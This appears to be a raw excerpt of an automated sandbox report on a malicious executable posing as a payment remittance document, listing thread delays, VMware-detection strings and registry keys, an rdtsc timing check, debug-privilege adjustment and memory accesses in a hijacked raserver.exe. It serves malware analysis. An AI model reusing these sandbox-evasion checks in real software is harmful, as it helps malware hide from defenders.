          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238309
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238156
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 238046
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237921
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237812
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237687
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237578
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237469
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237344
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237203
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 237047
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236921
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236797
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236672
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236547
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236422
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236297
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236172
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 236063
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235906
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235797
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235672
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235563
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235407
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235296
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235172
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 235047
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234906
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234765
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234655
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234547
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234437
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234328
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234219
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 234047
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233922
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233796
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 43239
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233672
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233546
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233437
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233297
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233187
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 233078
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 232953
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 232844
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 232703
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 232594
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 232484
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 232375
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000006.00000000.268488988.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000006.00000000.268488988.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000006.00000000.235824977.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.230183542.0000000004E61000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAv
          Source: explorer.exe, 00000006.00000000.268488988.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oft.Mic
          Source: explorer.exe, 00000006.00000000.291724518.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000006.00000000.236758134.0000000008907000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}##
          Source: explorer.exe, 00000006.00000000.230090929.0000000004DE0000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1SPS0
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp | Binary or memory string: VMWARE
          Source: explorer.exe, 00000006.00000000.268488988.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000006.00000000.268488988.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000006.00000000.253375018.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000006.00000000.248820491.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226477640.0000000002862000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Code function: 5_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_0477746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_047EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_047EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_0478A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04828CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_0478BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_047D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_047D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_047D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_047D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_048114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04811C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_047D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_047D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_047D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_0482740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_0482740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_0482740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_0476849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_0477C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_0477C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04777D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_048205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_048205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04793D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_047D3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04763D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04784D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04784D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04784D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047DA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04808DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04828D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04803D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04781DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04781DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04781DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04782581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04752D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04752D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04752D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04752D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04752D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04820EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04820EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04820EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04767E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04767E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04767E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04767E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04767E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04767E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0480FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04828ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0475C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04788E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04811608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04798EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0480FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0481AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047D46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0476EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04754F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04754F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0477F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0478A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_047937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0482070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_0482070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04768794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 19_2_04828F6A mov eax, dword ptr fs:[00000030h]
